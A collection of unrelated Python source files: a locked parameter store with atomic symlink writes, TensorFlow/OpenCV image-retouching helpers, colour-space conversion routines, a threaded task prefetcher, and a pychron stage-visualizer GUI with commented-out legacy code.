lock = FileLock(os.path.join(self._path, ".lock"), create, lock_ex)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False, False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
raise
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, exc_type, exc_value, traceback):
pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True, True)
self._vals = self._read_values_locked()
except Exception:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path + "/.lock", True, True)
lock.acquire()
try:
tmp_path = tempfile.NamedTemporaryFile(mode="wb", prefix=".tmp", dir=params_path, delete=False)
with tmp_path as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
os.chmod(tmp_path.name, 0o666)
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path.name, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db + "/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
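# Minimal usage sketch (assumes the PARAMS directory from common.basedir exists or can be
# created by the current user; the values shown are made up):
if __name__ == "__main__":
    params = Params()
    params.put("DongleId", b"0123456789abcdef")
    print(params.get("DongleId", encoding="utf8"))  # -> "0123456789abcdef"
    put_nonblocking("IsMetric", "1").join()  # background write, joined here only for the demo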
|
util.py
|
import math
import numpy as np
import cv2
import tensorflow as tf
import os
import sys
'''
output states:
0: has rewards?
1: stopped?
2: num steps
3:
'''
STATE_REWARD_DIM = 0
STATE_STOPPED_DIM = 1
STATE_STEP_DIM = 2
STATE_DROPOUT_BEGIN = 3
def get_expert_file_path(expert):
expert_path = 'data/artists/fk_%s/' % expert
return expert_path
# From github.com/OlavHN/fast-neural-style
def instance_norm(x):
epsilon = 1e-9
mean, var = tf.nn.moments(x, [1, 2], keep_dims=True)
return (x - mean) / tf.sqrt(var + epsilon)
def enrich_image_input(cfg, net, states):
if cfg.img_include_states:
print(("states for enriching", states.shape))
states = states[:, None, None, :] + (net[:, :, :, 0:1] * 0)
net = tf.concat([net, states], axis=3)
return net
# based on https://stackoverflow.com/questions/2352181/how-to-use-a-dot-to-access-members-of-dictionary
class Dict(dict):
"""
Example:
m = Dict({'first_name': 'Eduardo'}, last_name='Pool', age=24, sports=['Soccer'])
"""
def __init__(self, *args, **kwargs):
super(Dict, self).__init__(*args, **kwargs)
for arg in args:
if isinstance(arg, dict):
for k, v in arg.items():
self[k] = v
if kwargs:
for k, v in kwargs.items():
self[k] = v
def __getattr__(self, attr):
return self[attr]
def __setattr__(self, key, value):
self.__setitem__(key, value)
def __setitem__(self, key, value):
super(Dict, self).__setitem__(key, value)
self.__dict__.update({key: value})
def __delattr__(self, item):
self.__delitem__(item)
def __delitem__(self, key):
super(Dict, self).__delitem__(key)
del self.__dict__[key]
def make_image_grid(images, per_row=8, padding=2):
npad = ((0, 0), (padding, padding), (padding, padding), (0, 0))
images = np.pad(images, pad_width=npad, mode='constant', constant_values=1.0)
assert images.shape[0] % per_row == 0
num_rows = images.shape[0] // per_row
image_rows = []
for i in range(num_rows):
image_rows.append(np.hstack(images[i * per_row:(i + 1) * per_row]))
return np.vstack(image_rows)
def get_image_center(image):
if image.shape[0] > image.shape[1]:
start = (image.shape[0] - image.shape[1]) // 2
image = image[start:start + image.shape[1], :]
if image.shape[1] > image.shape[0]:
start = (image.shape[1] - image.shape[0]) // 2
image = image[:, start:start + image.shape[0]]
return image
def rotate_image(image, angle):
"""
Rotates an OpenCV 2 / NumPy image about its centre by the given angle
(in degrees). The returned image will be large enough to hold the entire
new image, with a black background
"""
# Get the image size
# No, that's not an error - NumPy stores image matrices backwards
image_size = (image.shape[1], image.shape[0])
image_center = tuple(np.array(image_size) // 2)
# Convert the OpenCV 3x2 rotation matrix to 3x3
rot_mat = np.vstack(
[cv2.getRotationMatrix2D(image_center, angle, 1.0), [0, 0, 1]])
rot_mat_notranslate = np.matrix(rot_mat[0:2, 0:2])
# Shorthand for below calcs
image_w2 = image_size[0] * 0.5
image_h2 = image_size[1] * 0.5
# Obtain the rotated coordinates of the image corners
rotated_coords = [
(np.array([-image_w2, image_h2]) * rot_mat_notranslate).A[0],
(np.array([image_w2, image_h2]) * rot_mat_notranslate).A[0],
(np.array([-image_w2, -image_h2]) * rot_mat_notranslate).A[0],
(np.array([image_w2, -image_h2]) * rot_mat_notranslate).A[0]
]
# Find the size of the new image
x_coords = [pt[0] for pt in rotated_coords]
x_pos = [x for x in x_coords if x > 0]
x_neg = [x for x in x_coords if x < 0]
y_coords = [pt[1] for pt in rotated_coords]
y_pos = [y for y in y_coords if y > 0]
y_neg = [y for y in y_coords if y < 0]
right_bound = max(x_pos)
left_bound = min(x_neg)
top_bound = max(y_pos)
bot_bound = min(y_neg)
new_w = int(abs(right_bound - left_bound))
new_h = int(abs(top_bound - bot_bound))
# We require a translation matrix to keep the image centred
trans_mat = np.matrix([[1, 0, int(new_w * 0.5 - image_w2)],
[0, 1, int(new_h * 0.5 - image_h2)], [0, 0, 1]])
# Compute the tranform for the combined rotation and translation
affine_mat = (np.matrix(trans_mat) * np.matrix(rot_mat))[0:2, :]
# Apply the transform
result = cv2.warpAffine(
image, affine_mat, (new_w, new_h), flags=cv2.INTER_LINEAR)
return result
def largest_rotated_rect(w, h, angle):
"""
Given a rectangle of size wxh that has been rotated by 'angle' (in
radians), computes the width and height of the largest possible
axis-aligned rectangle within the rotated rectangle.
Original JS code by 'Andri' and Magnus Hoff from Stack Overflow
Converted to Python by Aaron Snoswell
"""
quadrant = int(math.floor(angle / (math.pi / 2))) & 3
sign_alpha = angle if ((quadrant & 1) == 0) else math.pi - angle
alpha = (sign_alpha % math.pi + math.pi) % math.pi
bb_w = w * math.cos(alpha) + h * math.sin(alpha)
bb_h = w * math.sin(alpha) + h * math.cos(alpha)
gamma = math.atan2(bb_w, bb_w) if (w < h) else math.atan2(bb_w, bb_w)
delta = math.pi - alpha - gamma
length = h if (w < h) else w
d = length * math.cos(alpha)
a = d * math.sin(alpha) / math.sin(delta)
y = a * math.cos(gamma)
x = y * math.tan(gamma)
return (bb_w - 2 * x, bb_h - 2 * y)
def crop_around_center(image, width, height):
"""
Given a NumPy / OpenCV 2 image, crops it to the given width and height,
around its centre point
"""
image_size = (image.shape[1], image.shape[0])
image_center = (int(image_size[0] * 0.5), int(image_size[1] * 0.5))
if (width > image_size[0]):
width = image_size[0]
if (height > image_size[1]):
height = image_size[1]
x1 = int(image_center[0] - width * 0.5)
x2 = int(image_center[0] + width * 0.5)
y1 = int(image_center[1] - height * 0.5)
y2 = int(image_center[1] + height * 0.5)
return image[y1:y2, x1:x2]
# angle: degrees
def rotate_and_crop(image, angle):
image_width, image_height = image.shape[:2]
image_rotated = rotate_image(image, angle)
image_rotated_cropped = crop_around_center(image_rotated,
*largest_rotated_rect(
image_width, image_height,
math.radians(angle)))
return image_rotated_cropped
def lrelu(x, leak=0.2, name="lrelu"):
with tf.variable_scope(name):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# clamps to 0, 1 with leak
def double_lrelu(x, leak=0.1, name="double_lrelu"):
with tf.variable_scope(name):
return tf.minimum(tf.maximum(leak * x, x), leak * x - (leak - 1))
# clamp to lower, upper; leak is RELATIVE
def leaky_clamp(x, lower, upper, leak=0.1, name="leaky_clamp"):
with tf.variable_scope(name):
x = (x - lower) / (upper - lower)
return tf.minimum(tf.maximum(leak * x, x), leak * x -
(leak - 1)) * (upper - lower) + lower
class Tee(object):
def __init__(self, name):
self.file = open(name, 'w')
self.stdout = sys.stdout
self.stderr = sys.stderr
sys.stdout = self
sys.stderr = self
def __del__(self):
self.file.close()
def write(self, data):
self.file.write(data)
self.stdout.write(data)
self.file.flush()
self.stdout.flush()
def write_to_file(self, data):
self.file.write(data)
def flush(self):
self.file.flush()
def rgb2lum(image):
image = 0.27 * image[:, :, :, 0] + 0.67 * image[:, :, :,
1] + 0.06 * image[:, :, :, 2]
return image[:, :, :, None]
def tanh01(x):
return tf.tanh(x) * 0.5 + 0.5
def tanh_range(l, r, initial=None):
def get_activation(left, right, initial):
def activation(x):
if initial is not None:
bias = math.atanh(2 * (initial - left) / (right - left) - 1)
else:
bias = 0
return tanh01(x + bias) * (right - left) + left
return activation
return get_activation(l, r, initial)
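# e.g. tanh_range(0.5, 2.0, initial=1.0) returns an activation that squashes any real input
# into the open interval (0.5, 2.0) and maps x = 0 exactly to the given initial value 1.0
# (assuming left < initial < right so that atanh is defined).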
def merge_dict(a, b):
ret = a.copy()
for key, val in list(b.items()):
if key in ret:
assert False, 'Item ' + key + ' already exists'
else:
ret[key] = val
return ret
def lerp(a, b, l):
return (1 - l) * a + l * b
def read_tiff16(fn):
import tifffile
import numpy as np
img = tifffile.imread(fn)
if img.dtype == np.uint8:
depth = 8
elif img.dtype == np.uint16:
depth = 16
else:
print("Warning: unsupported data type {}. Assuming 16-bit.", img.dtype)
depth = 16
return (img * (1.0 / (2**depth - 1))).astype(np.float32)
def load_config(config_name):
scope = {}
exec ('from config_%s import cfg' % config_name, scope)
return scope['cfg']
# ======================================================================================================================
# added by Hao He
# ======================================================================================================================
def get_artist_batch(folder, size=128, num=64):
import os
js = os.listdir(folder)
np.random.shuffle(js)
imgs = np.zeros((num, size, size, 3))
for i, jpg in enumerate(js[:num]):
img = cv2.imread(folder + '/' + jpg)
img = get_image_center(img) / 255.
imgs[i] = cv2.resize(img, dsize=(size, size))
return imgs
def show_artist_subnails(folder, size=128, num_row=8, num_column=8):
imgs = get_artist_batch(folder, size, num_row * num_column)
return make_image_grid(imgs, per_row=num_row)
def np_tanh_range(l, r):
def get_activation(left, right):
def activation(x):
return np.tanh(x) * (right - left) + left
return activation
return get_activation(l, r)
class WB2:
def filter_param_regressor(self, features):
log_wb_range = np.log(5)
color_scaling = np.exp(
np_tanh_range(-log_wb_range, log_wb_range)(features[:, :3]))
# There will be no division by zero here unless the WB range lower bound is 0
return color_scaling
def process(self, img, param):
lum = (img[:, :, :, 0] * 0.27 + img[:, :, :, 1] * 0.67 +
img[:, :, :, 2] * 0.06 + 1e-5)[:, :, :, None]
tmp = img * param[:, None, None, :]
tmp = tmp / (tmp[:, :, :, 0] * 0.27 + tmp[:, :, :, 1] * 0.67 +
tmp[:, :, :, 2] * 0.06 + 1e-5)[:, :, :, None] * lum
return tmp
def degrade_images_in_folder(
folder,
dst_folder_suffix,
LIGHTDOWN=True,
UNBALANCECOLOR=True,):
import os
js = os.listdir(folder)
dst_folder = folder + '-' + dst_folder_suffix
try:
os.mkdir(dst_folder)
except:
print('dir exist!')
print('in ' + dst_folder)
num = 3
for j in js:
img = cv2.imread(folder + '/' + j) / 255.
if LIGHTDOWN:
for _ in range(num - 1):
out = pow(img, np.random.uniform(0.4, 0.6)) * np.random.uniform(
0.25, 0.5)
cv2.imwrite(dst_folder + '/' + ('L%d-' % _) + j, out * 255.)
out = img * img
out = out * (1.0 / out.max())
cv2.imwrite(dst_folder + '/' + ('L%d-' % num) + j, out * 255.)
if UNBALANCECOLOR:
filter = WB2()
outs = np.array([img] * num)
features = np.abs(np.random.rand(num, 3))
for _, out in enumerate(
filter.process(outs, filter.filter_param_regressor(features))):
# print out.max()
out /= out.max()
out *= np.random.uniform(0.7, 1)
cv2.imwrite(dst_folder + '/' + ('C%d-' % _) + j, out * 255.)
def vis_images_and_indexs(images, features, dir, name):
# indexs = np.reshape(indexs, (len(indexs),))
# print('visualizing images and indexs: ', images.shape, indexs.shape)
id_imgs = []
for feature in features:
img = np.ones((64, 64, 3))
cv2.putText(img,
str(feature), (4, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.25,
(1.0, 0.0, 0.0))
id_imgs.append(img)
id_imgs = np.stack(id_imgs, axis=0)
# print('id imgs: ', id_imgs.shape)
vis_imgs = np.vstack([images, id_imgs])
image = make_image_grid(vis_imgs, per_row=images.shape[0])
vis_dir = dir
try:
os.mkdir(vis_dir)
except:
pass
cv2.imwrite(os.path.join(vis_dir, name + '.png'), image[:, :, ::-1] * 255.0)
def read_set(name):
if name == 'u_test':
fn = 'data/folds/FiveK_test.txt'
need_reverse = False
elif name == 'u_amt':
fn = 'data/folds/FiveK_test_AMT.txt'
need_reverse = False
elif name == '5k': # add by hao
return list(range(1, 5001))
elif name == '2k_train':
fn = 'data/folds/FiveK_train_first2k.txt'
need_reverse = False
elif name == '2k_target':
fn = 'data/folds/FiveK_train_second2k.txt'
need_reverse = False
else:
assert False, name + ' not found'
l = []
ln = 0
with open(fn, 'r') as f:
for i in f:
if i[0] != '#':
try:
i = int(i)
ln += 1
l.append(i)
except Exception as e:
print(e)
pass
if need_reverse:
l = list(set(range(1, 5001)) - set(l))
return l
'''
util_image.py
Copyright (c) 2014 Zhicheng Yan (zhicheng.yan@live.com)
modified 2017 by Yuanming Hu (yuanmhu@gmail.com)
note that some of the color space conversions are NOT exact, like gamma 1.8 or 2.2
'''
import numpy as np
from skimage import color
import tifffile as tiff
class UtilImageError(Exception):
pass
''' undo gamma correction '''
def linearize_ProPhotoRGB(pp_rgb, reverse=False):
if not reverse:
gamma = 1.8
else:
gamma = 1.0 / 1.8
pp_rgb = np.power(pp_rgb, gamma)
return pp_rgb
def XYZ_chromatic_adapt(xyz, src_white='D65', dest_white='D50'):
if src_white == 'D65' and dest_white == 'D50':
M = [[1.0478112, 0.0228866, -0.0501270], \
[0.0295424, 0.9904844, -0.0170491], \
[-0.0092345, 0.0150436, 0.7521316]]
elif src_white == 'D50' and dest_white == 'D65':
M = [[0.9555766, -0.0230393, 0.0631636], \
[-0.0282895, 1.0099416, 0.0210077], \
[0.0122982, -0.0204830, 1.3299098]]
else:
    raise UtilImageError('invalid pair of source and destination white reference %s,%s'
                         % (src_white, dest_white))
M = np.array(M)
sp = xyz.shape
assert sp[2] == 3
xyz = np.transpose(np.dot(M, np.transpose(xyz.reshape((sp[0] * sp[1], 3)))))
return xyz.reshape((sp[0], sp[1], 3))
# pp_rgb float in range [0,1], linear ProPhotoRGB
# reference white is D50
def ProPhotoRGB2XYZ(pp_rgb, reverse=False):
if not reverse:
M = [[0.7976749, 0.1351917, 0.0313534], \
[0.2880402, 0.7118741, 0.0000857], \
[0.0000000, 0.0000000, 0.8252100]]
else:
M = [[1.34594337, -0.25560752, -0.05111183], \
[-0.54459882, 1.5081673, 0.02053511], \
[0, 0, 1.21181275]]
M = np.array(M)
sp = pp_rgb.shape
xyz = np.transpose(
np.dot(M, np.transpose(pp_rgb.reshape((sp[0] * sp[1], sp[2])))))
return xyz.reshape((sp[0], sp[1], 3))
''' normalize L channel so that minimum of L is 0 and maximum of L is 100 '''
def normalize_Lab_image(lab_image):
h, w, ch = lab_image.shape[0], lab_image.shape[1], lab_image.shape[2]
assert ch == 3
lab_image = lab_image.reshape((h * w, ch))
L_ch = lab_image[:, 0]
L_min, L_max = np.min(L_ch), np.max(L_ch)
# print 'before normalization L min %f,Lmax %f' % (L_min,L_max)
scale = 100.0 / (L_max - L_min)
lab_image[:, 0] = (lab_image[:, 0] - L_min) * scale
  # print 'after normalization L min %f,Lmax %f' %\
  #   (np.min(lab_image[:, 0]), np.max(lab_image[:, 0]))
return lab_image.reshape((h, w, ch))
''' white reference 'D65' '''
def read_tiff_16bit_img_into_XYZ(tiff_fn, exposure=0):
pp_rgb = tiff.imread(tiff_fn)
pp_rgb = np.float64(pp_rgb) / (2**16 - 1.0)
if not pp_rgb.shape[2] == 3:
print('pp_rgb shape', pp_rgb.shape)
raise UtilImageError('image channel number is not 3')
pp_rgb = linearize_ProPhotoRGB(pp_rgb)
pp_rgb *= np.power(2, exposure)
xyz = ProPhotoRGB2XYZ(pp_rgb)
xyz = XYZ_chromatic_adapt(xyz, src_white='D50', dest_white='D65')
return xyz
def ProPhotoRGB2Lab(img):
if not img.shape[2] == 3:
print('pp_rgb shape', img.shape)
raise UtilImageError('image channel number is not 3')
img = linearize_ProPhotoRGB(img)
xyz = ProPhotoRGB2XYZ(img)
lab = color.xyz2lab(xyz)
return lab
def linearProPhotoRGB2Lab(img):
if not img.shape[2] == 3:
print('pp_rgb shape', img.shape)
raise UtilImageError('image channel number is not 3')
xyz = ProPhotoRGB2XYZ(img)
lab = color.xyz2lab(xyz)
return lab
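# Illustrative pipeline sketch (hypothetical TIFF path): read_tiff_16bit_img_into_XYZ()
# already chains the linearization, the ProPhotoRGB->XYZ matrix and the D50->D65
# adaptation, so going all the way to Lab is one more call:
#   xyz = read_tiff_16bit_img_into_XYZ('raw/a0001.tif', exposure=0)
#   lab = color.xyz2lab(xyz)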
import threading
import time
class AsyncTaskManager:
def __init__(self, target, args=(), kwargs={}):
self.target = target
self.args = args
self.kwargs = kwargs
self.condition = threading.Condition()
self.result = None
self.thread = threading.Thread(target=self.worker)
self.stopped = False
self.thread.daemon = True
self.thread.start()
def worker(self):
while True:
self.condition.acquire()
while self.result is not None:
if self.stopped:
self.condition.release()
return
self.condition.notify()
self.condition.wait()
self.condition.notify()
self.condition.release()
result = (self.target(*self.args, **self.kwargs),)
self.condition.acquire()
self.result = result
self.condition.notify()
self.condition.release()
def get_next(self):
self.condition.acquire()
while self.result is None:
self.condition.notify()
self.condition.wait()
result = self.result[0]
self.result = None
self.condition.notify()
self.condition.release()
return result
def stop(self):
while self.thread.is_alive():
self.condition.acquire()
self.stopped = True
self.condition.notify()
self.condition.release()
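# Design note: the worker starts computing the next result as soon as the previous
# one is consumed, so get_next() overlaps the task with the caller's own work; in
# test_async_task_manager() below, five 1 s tasks interleaved with five 1 s sleeps
# should finish in roughly 6 s instead of the ~10 s a sequential loop would need.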
def test_async_task_manager():
def task():
print('begin sleeping...')
time.sleep(1)
print('end sleeping.')
task.i += 1
print('returns', task.i)
return task.i
task.i = 0
  async_mgr = AsyncTaskManager(task)
  t = time.time()
  for i in range(5):
    ret = async_mgr.get_next()
    # ret = task()
    print('got', ret)
    time.sleep(1)
  async_mgr.stop()
print(time.time() - t)
|
stage_visualizer.py
|
# ===============================================================================
# Copyright 2012 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from chaco.pdf_graphics_context import PdfPlotGraphicsContext
from enable.component_editor import ComponentEditor
from traits.api import Instance, List, Property, Str
from traitsui.api import View, HGroup, UItem, TabularEditor, Handler, Action
from traitsui.tabular_adapter import TabularAdapter
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.core.helpers.filetools import unique_date_path
from pychron.core.helpers.formatting import floatfmt
from pychron.loggable import Loggable
from pychron.canvas.canvas2D.stage_visualization_canvas import StageVisualizationCanvas
from pychron.pychron_constants import LIGHT_RED
from pychron.stage.maps.laser_stage_map import LaserStageMap
from pychron.paths import paths
class ResultsAdapter(TabularAdapter):
columns = [("Hole", "hole_id"), ("dX", "dx"), ("dY", "dy")]
dx_text = Property
dy_text = Property
def get_bg_color(self, obj, trait, row, column=0):
item = getattr(obj, trait)[row]
if not item.corrected:
return LIGHT_RED
def _get_dx_text(self):
return floatfmt(self.item.dx, n=3)
def _get_dy_text(self):
return floatfmt(self.item.dy, n=3)
class StageVisualizerHandler(Handler):
def save(self, info):
info.object.save()
class StageVisualizer(Loggable):
canvas = Instance(StageVisualizationCanvas, ())
results = List
stage_map_name = Str
def set_stage_map(self, smap, points, calibration):
self.stage_map_name = smap.name
self.canvas.build_map(smap, points, calibration)
def save(self):
root = paths.corrections_dir
base = self.stage_map_name
p = unique_date_path(root, base, extension="")
gp = "{}.{}".format(p, "pdf")
gc = PdfPlotGraphicsContext(filename=gp, pagesize="letter")
from reportlab.lib.pagesizes import letter
bounds = self.canvas.bounds
self.canvas.do_layout(size=letter, force=True)
gc.render_component(self.canvas, valign="center")
gc.save(p)
self.canvas.do_layout(size=bounds, force=True)
self.canvas.invalidate_and_redraw()
tp = "{}.{}".format(p, "txt")
with open(tp, "w") as wfile:
for r in self.results:
args = r.nx, r.ny, r.dx, r.dy
args = ["{:0.5f}".format(x) for x in args]
args = [r.hole_id, str(r.corrected)] + args
line = ",".join(args)
wfile.write("{}\n".format(line))
def traits_view(self):
v = View(
HGroup(
UItem("canvas", editor=ComponentEditor(width=550, height=550)),
UItem("results", editor=TabularEditor(adapter=ResultsAdapter())),
),
handler=StageVisualizerHandler(),
buttons=[
Action(action="save", name="Save"),
],
title="Stage Visualizer",
resizable=True,
)
return v
if __name__ == "__main__":
from pychron.core.helpers.logger_setup import logging_setup
paths.build("_dev")
logging_setup("sv", use_archiver=False, use_file=False)
p = (
"/Users/ross/Programming/github/support_pychron/setupfiles/tray_maps"
"/221-hole.txt"
)
# p = '/Users/argonlab3/Pychron_co2/setupfiles/tray_maps/221-small_hole.txt'
sm = LaserStageMap(file_path=p)
sv = StageVisualizer()
results = [
((-3.9878, 15.9512), True),
((-1.9939, 15.5), False),
((0, 15.9512), True),
]
class CO:
rotation = 1
center = -2, 0
sv.set_stage_map(sm, results, CO())
sv.configure_traits()
# ============= EOF =============================================
# class StageVisualizer(Manager):
# canvas = Instance(StageVisualizationCanvas)
# stage_map = Instance(LaserStageMap)
# status_text = Str
#
# use_calibration = Bool(True)
# flag = True
# center = Tuple(Float, Float)
# rotation = Float(23)
# path = None
#
# def __init__(self, *args, **kw):
# super(StageVisualizer, self).__init__(*args, **kw)
# # p = os.path.join(data_dir, 'stage_visualizer')
# self.path, _ = unique_path(paths.stage_visualizer_dir, 'vis',
# extension='')
#
# def update_calibration(self, obj, name, new):
# self.clear()
# if name == 'calibration_item':
# self.center = new.center
# self.rotation = new.rotation
# else:
# setattr(self, name, new)
#
# self.canvas.build_map(self.stage_map, calibration=[self.center,
# self.rotation])
#
# def set_calibration(self, ca):
# pass
#
# # self.clear()
# # self.center = ca.get_center_position()
# # self.rotation = ca.get_rotation()
# #
# # self.canvas.build_map(self.stage_map, calibration=[self.center,
# # self.rotation])
#
# def clear(self):
# self.info('clearing visualizer')
# # sm = self.stage_map
# #
# # sm.clear_correction_file()
# # sm.clear_interpolations()
#
# self.canvas.clear()
#
# def dump(self):
# with open(self.path, 'wb') as f:
# d = dict(center=self.center,
# rotation=self.rotation,
# markup=self.canvas.markupcontainer)
#
# pickle.dump(d, f)
#
# def load_visualization(self):
# p = self.open_file_dialog()
#
# if p is not None:
# with open(p, 'rb') as f:
# # try:
# d = pickle.load(f)
#
# self.center = d['center']
# self.rotation = d['rotation']
#
# for k, v in d['markup'].iteritems():
# v.set_canvas(self.canvas)
#
# self.canvas.markupcontainer = d['markup']
# # except Exception, e:
# # print 'exception', e
#
# # self.canvas.invalidate_and_redraw()
#
# def set_current_hole(self, h):
# self.canvas.set_current_hole(h)
# self.canvas.request_redraw()
#
# def record_uncorrected(self, h, dump=True, *args):
# self.canvas.record_uncorrected(h)
# if dump:
# self.dump()
#
# def record_correction(self, h, x, y, dump=True):
# self.canvas.record_correction(h, x, y)
# if dump:
# self.dump()
#
# def record_interpolation(self, hole, x, y, color=(1, 1, 0), dump=True):
# if isinstance(hole, (str, int)):
# hole = self.stage_map.get_hole(str(hole))
#
# self.canvas.record_interpolation(hole, x, y, color)
# if dump:
# self.dump()
#
# @on_trait_change('canvas:selected')
# def update_status_bar(self, parent, name, obj):
# if isinstance(obj, SampleHole):
# correction = ''
# if obj.hole.corrected:
# correction = 'cor.= ({:0.2f},{:0.2f})'.format(obj.hole.x_cor,
# obj.hole.y_cor
# )
# # interpolation = ''
# # if obj.hole.interpolated:
# # h = ', '.join(sorted(set([iph.id for iph in obj.hole.interpolation_holes])))
# # interpolation = 'interpolation holes= {}'.format(h)
#
# self.status_text = 'hole = {} nom.= ({:0.2f},{:0.2f}) cal.=({:0.2f},{:0.2f}) {}'.format(obj.name,
# obj.hole.x,
# obj.hole.y,
# obj.x,
# obj.y,
# correction)
#
# def _use_calibration_changed(self):
# ca = self.canvas
# ca.build_map(self.stage_map,
# calibration=[self.center,
# self.rotation] if self.use_calibration else None
# )
#
# def traits_view(self):
# v = View(
# # Item('test'),
# # HGroup(Item('center', style='readonly'), Item('rotation', style='readonly')),
# Item('canvas', editor=ComponentEditor(width=550,
# height=550),
# show_label=False),
#
# statusbar='status_text',
# title='Stage Visualizer',
# resizable=True
# )
# return v
#
# def _stage_map_default(self):
# p = os.path.join(paths.map_dir, '61-hole.txt')
# sm = LaserStageMap(file_path=p)
# sm.load_correction_file()
# return sm
#
# def _canvas_default(self):
# c = StageVisualizationCanvas()
# c.build_map(self.stage_map, calibration=(self.center,
# self.rotation))
#
# return c
#
# # ===============================================================================
# # testing
# # ===============================================================================
# def test_view(self):
# v = View(Item('test'),
# Item('use_calibration'),
# Item('center'),
# Item('rotation'),
# Item('canvas', editor=ComponentEditor(width=700,
# height=700),
# show_label=False),
#
# statusbar='status_text'
# )
# return v
#
# def _test_fired(self):
# t = Thread(target=self._execute_)
# t.start()
#
# def _apply_calibration(self, hole):
# cpos = (0, 0)
# rot = 0
# if self.use_calibration:
# cpos = self.center
# rot = self.rotation
#
# return self.stage_map.map_to_calibration(hole.nominal_position,
# cpos, rot)
#
# def _execute_(self):
#
# ca = self.canvas
#
# self.clear()
# sm = self.stage_map
# sm.clear_correction_file()
# sm.clear_interpolations()
#
# ca.build_map(sm, calibration=[self.center,
# self.rotation] if self.use_calibration else None
# )
# ca.invalidate_and_redraw()
#
# # set some correction values
# vs = range(61)
